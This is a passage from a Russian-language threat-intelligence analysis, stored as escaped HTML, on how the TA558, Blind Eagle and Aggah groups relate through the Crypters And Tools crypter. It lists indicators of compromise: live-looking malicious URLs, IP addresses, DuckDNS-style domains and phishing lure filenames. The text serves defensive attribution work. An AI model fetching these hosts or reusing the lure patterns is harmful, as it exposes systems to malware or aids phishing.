\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 Crypters And Tools \u0447\u0430\u0441\u0442\u043e \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u043b\u0438 \u043b\u043e\u0436\u043d\u044b\u0435 \u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 \u0438\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u0440\u0430\u043d\u0435\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0440 \u2013 \u044d\u0442\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u044c, \u0430 \u043d\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438. \u041f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u043c\u043e\u0436\u0435\u0442 \u0441\u043b\u0443\u0436\u0438\u0442\u044c<a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN\/\"> \u043e\u0442\u0447\u0435\u0442<\/a> \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 Qi An Xin 2023 \u0433\u043e\u0434\u0430, \u0433\u0434\u0435 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 Aggah \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u043e\u0439 Blind Eagle, \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u043c \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0435 TTP, \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u043c \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438 \u0431\u043b\u0438\u0437\u043a\u0438\u043c \u0446\u0435\u043b\u044f\u043c \u0438 \u0442.\u0434. \u041c\u044b \u043d\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u044d\u0442\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c, \u043d\u043e \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043c\u044b \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043f\u0440\u0438 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445 \u0441\u0442\u0430\u0434\u0438\u0439 \u0430\u0442\u0430\u043a \u043e\u0442\u043b\u0438\u0447\u0438\u044f TA558 \u0438 Blind Eagle \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0442\u044c\u0441\u044f.<\/p>\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043c\u044b \u0443\u043a\u0430\u0436\u0435\u043c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 TA558 \u0438 Blind Eagle, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043d\u0430\u043c \u0438\u0445 \u0440\u0430\u0437\u043b\u0438\u0447\u0430\u0442\u044c. \u042d\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u043d\u0430\u043c \u043d\u0430\u0439\u0442\u0438 \u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 Crypters And Tools \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435.<\/p>\n<p><a class=\"anchor\" name=\"5.1\" id=\"5.1\"><\/a><\/p>\n<h3>5.1 \u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 URL \u0438 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 TA558<\/h3>\n<p>\u0412 \u0430\u0442\u0430\u043a\u0430\u0445 TA558 \u0447\u0430\u0441\u0442\u043e \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u044b URL, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043d\u0435 \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u043c \u0441 Crypters And Tools:<\/p>\n<ul>\n<li>\n<p>103.67.162.213\/xampp\/gd\/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc<\/p>\n<\/li>\n<li>\n<p>172.232.175.155\/88122\/bh\/bh.h.h.h.hhhhh.doC<\/p>\n<\/li>\n<li>\n<p>172.234.239.22\/990099\/gf\/l.c.c.c.ccx.doC<\/p>\n<\/li>\n<\/ul>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0441\u0440\u0435\u0434\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 TA558 \u0431\u044b\u043b\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043c\u0435\u043d \u0438 \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u043e\u0432. \u041f\u0440\u0438\u043c\u0435\u0440\u044b \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0445 \u0438\u043c\u0435\u043d \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0438\u0436\u0435:<\/p>\n<ul>\n<li>\n<p>PO-24052800.xls<\/p>\n<\/li>\n<li>\n<p>factura 00005111, 005114, 005115.pdf.xlam<\/p>\n<\/li>\n<li>\n<p>Orden de compra 4000171682.docx<\/p>\n<\/li>\n<\/ul>\n<p>\u0412\u044b\u0448\u0435\u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b, \u043d\u043e \u0441\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0451 \u0436\u0435 \u043c\u044b \u0432\u0438\u0434\u0435\u043b\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0443 \u043e\u0434\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u2013 bukky101, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0431\u0443\u0434\u0435\u0442 \u0441\u043a\u0430\u0437\u0430\u043d\u043e \u0434\u0430\u043b\u0435\u0435.<\/p>\n<p><a class=\"anchor\" name=\"5.2\" id=\"5.2\"><\/a><\/p>\n<h3>5.2 \u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u044b TA558<\/h3>\n<p>\u0422\u0410558, Blind Eagle \u0438 Aggah \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u0435 DNS \u0441\u0435\u0440\u0432\u0438\u0441\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a <a href=\"http:\/\/duckdns.org\">duckdns.org<\/a>, 3utilities \u0438\u043b\u0438 <a href=\"http:\/\/us.archive.org\">us.archive.org<\/a>. \u0412 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043b\u0443\u0447\u0430\u0435\u0432 \u044d\u0442\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Crypters And Tools. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 URL,<a href=\"https:\/\/www.ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru\/\"> \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b TA558<\/a> \u0432 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0432\u0435\u0440\u0441\u0438\u0439 Crypters And Tools \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0430\u043c\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430:<\/p>\n<ul>\n<li>\n<p>http:\/\/servidorwindows.ddns.com.br\/Files\/js.jpeg<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ff\/fff\/a78\/4fffffa78e597509aaae59207631c58d.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. URL \u0438\u0437 \u043e\u0442\u0447\u0435\u0442\u0430 \u043e TA558, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. URL \u0438\u0437 \u043e\u0442\u0447\u0435\u0442\u0430 \u043e TA558, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\" width=\"1137\" height=\"307\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4ff\/fff\/a78\/4fffffa78e597509aaae59207631c58d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ff\/fff\/a78\/4fffffa78e597509aaae59207631c58d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. URL \u0438\u0437 \u043e\u0442\u0447\u0435\u0442\u0430 \u043e TA558, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043c\u044b \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043e\u043c\u0435\u043d\u043e\u0432, \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0438\u0445 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u044b TA558, \u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u043c\u0438 \u0434\u043b\u0438\u043d\u043d\u044b\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0430\u043c\u043e\u0433\u043e Crypters And Tools. \u041d\u0438\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u044b \u0442\u0430\u043a\u0438\u0435 \u0434\u043e\u043c\u0435\u043d\u044b \u0441 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u044e\u0449\u0438\u043c\u0438\u0441\u044f \u0431\u0443\u043a\u0432\u0430\u043c\u0438 \u0432\u043d\u0443\u0442\u0440\u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0439 \u0434\u043d\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0438:<\/p>\n<ul>\n<li>\n<p>mondayyyyvbsgreeceee.duckdns.org<\/p>\n<\/li>\n<li>\n<p>wednesdayyyyyyfile.duckdns.org<\/p>\n<\/li>\n<li>\n<p>thursdayyyyyyfileeee.duckdns.org<\/p>\n<\/li>\n<li>\n<p>fridayyyyvert.3utilities.com<\/p>\n<\/li>\n<\/ul>\n<p><a class=\"anchor\" name=\"5.3\" id=\"5.3\"><\/a><\/p>\n<h3>5.3 \u0420\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 TA558 \u0438 Blind Eagle<\/h3>\n<p>\u00a0Blind Eagle \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043a\u043e\u043b\u0443\u043c\u0431\u0438\u0439\u0441\u043a\u0438\u0435 ASN, \u0432 \u0442\u043e \u0432\u0440\u0435\u043c\u044f \u043a\u0430\u043a \u0443 TA558 \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043e \u043d\u0435 \u0431\u044b\u043b\u043e. \u041d\u0438\u0436\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0442\u0430\u0431\u043b\u0438\u0446\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 ASN \u0443 \u0433\u0440\u0443\u043f\u043f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u044b IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u0438\u0437 \u044d\u0442\u0438\u0445 ASN, \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a TA558 \u0438 Blind Eagle.<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>\u0413\u0440\u0443\u043f\u043f\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0422\u043e\u043f ASN \u0433\u0440\u0443\u043f\u043f\u044b<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041f\u0440\u0438\u043c\u0435\u0440 IP \u0430\u0434\u0440\u0435\u0441\u043e\u0432<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\">\n<p align=\"left\"><strong>Blind Eagle<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">Colombia Movil<\/p>\n<\/td>\n<td rowspan=\"3\">\n<p align=\"left\">179.15.149.222<\/p>\n<p align=\"left\">191.88.255.30<\/p>\n<p align=\"left\">181.134.151.81<\/p>\n<p align=\"left\">181.131.216.73<\/p>\n<p align=\"left\">181.52.105.166<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Telmex Colombia<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Tigo \u2013 UNE<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\">\n<p align=\"left\"><strong>TA558<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">AS-COLOCROSSING<\/p>\n<\/td>\n<td rowspan=\"3\">\n<p align=\"left\">192.210.150.33<\/p>\n<p align=\"left\">107.172.148.248<\/p>\n<p align=\"left\">104.168.7.36<\/p>\n<p align=\"left\">149.28.237.172<\/p>\n<p align=\"left\">172.234.217.133<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Akamai Connected Cloud<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">AS-VULTR<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 4. \u0418\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432<\/p>\n<p><a class=\"anchor\" name=\"6\" id=\"6\"><\/a><\/p>\n<h2>6. Aggah. \u041d\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0441\u0432\u044f\u0437\u044c \u0441 TA558<\/h2>\n<p><strong>Aggah (Hagga)<\/strong> \u2013 \u044d\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043a\u0440\u0430\u0436\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u0421\u0440\u0435\u0434\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0412\u041f\u041e \u2013 RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, NjRAT, AzoRult \u0438 \u0434\u0440\u0443\u0433\u043e\u0435. \u041e\u0441\u043e\u0431\u044b\u0439 \u044d\u043b\u0435\u043c\u0435\u043d\u0442 \u0432 \u0438\u0445 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0430\u0442\u0430\u043a\u0438 \u2013 \u0447\u0430\u0441\u0442\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 serverless \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, Blogspot, Pastebin \u0438\u043b\u0438 WebArchive. \u0412 2018 \u0433\u043e\u0434\u0443 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 FreeBuf<a href=\"https:\/\/www.freebuf.com\/articles\/paper\/168528.html\"> \u0432\u044b\u0448\u043b\u0430<\/a> \u0441\u0442\u0430\u0442\u044c\u044f, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c\u0430\u044f \u043b\u0438\u0447\u043d\u043e\u0441\u0442\u044c, \u0441\u0442\u043e\u044f\u0449\u0430\u044f \u0437\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439. \u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438 \u043c\u043e\u0436\u043d\u043e \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0442\u044c, \u0447\u0442\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u044b Aggah \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442\u044c \u0438\u0437 \u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0430.<\/p>\n<p>\u041d\u0438\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u044b \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 TA558 \u0438 Aggah \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u0438 \u043f\u0440\u043e\u0448\u043b\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432. \u041e\u0434\u043d\u0430\u043a\u043e \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u0434\u043d\u0430 \u0438 \u0442\u0430 \u0436\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435. \u041d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e Aggah \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u0441\u0432\u044f\u0437\u044c \u0441 TA558, \u043e\u0431\u043c\u0435\u043d\u0438\u0432\u0430\u044f\u0441\u044c \u0438\u0434\u0435\u044f\u043c\u0438 \u0434\u043b\u044f \u0430\u0442\u0430\u043a, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u043c \u0412\u041f\u041e \u0438 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.<\/p>\n<p>\u0427\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0438\u043b\u043b\u044e\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0432\u044f\u0437\u044c Aggah \u0438 TA558 \u043d\u0430\u043c \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0443\u0433\u043b\u0443\u0431\u0438\u0442\u044c\u0441\u044f \u0432 \u043f\u0435\u0440\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 Aggah, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 \u0441\u0432\u043e\u0435\u0433\u043e \u0438\u043c\u0435\u043d\u0438.<\/p>\n<p><a class=\"anchor\" name=\"6.1\" id=\"6.1\"><\/a><\/p>\n<h3>6.1 \u041f\u0435\u0440\u0432\u044b\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f Aggah<\/h3>\n<p>\u041f\u0435\u0440\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0432 2018 \u0433\u043e\u0434\u0443 \u2013 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Roma225 \u0438 Operation Commando. \u0410\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u044f \u044d\u0442\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u043a \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u0430 \u0434\u0430\u043b\u0435\u0435.<\/p>\n<p><a class=\"anchor\" name=\"6.1.1.\" id=\"6.1.1.\"><\/a><\/p>\n<h4>6.1.1. \u0410\u0442\u0430\u043a\u0438 2018 \u0433\u043e\u0434\u0430<\/h4>\n<p>\u00a0\u0410\u043d\u0430\u043b\u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Roma225,<a href=\"https:\/\/yoroi.company\/research\/the-enigmatic-roma225-campaign\/\"> \u0432\u044b\u0448\u0435\u043b<\/a> \u0432 \u0434\u0435\u043a\u0430\u0431\u0440\u0435 2018 \u0433\u043e\u0434\u0430 \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Yoroi. \u0412 \u044d\u0442\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u043f\u0438\u0441\u0430\u043b\u0438 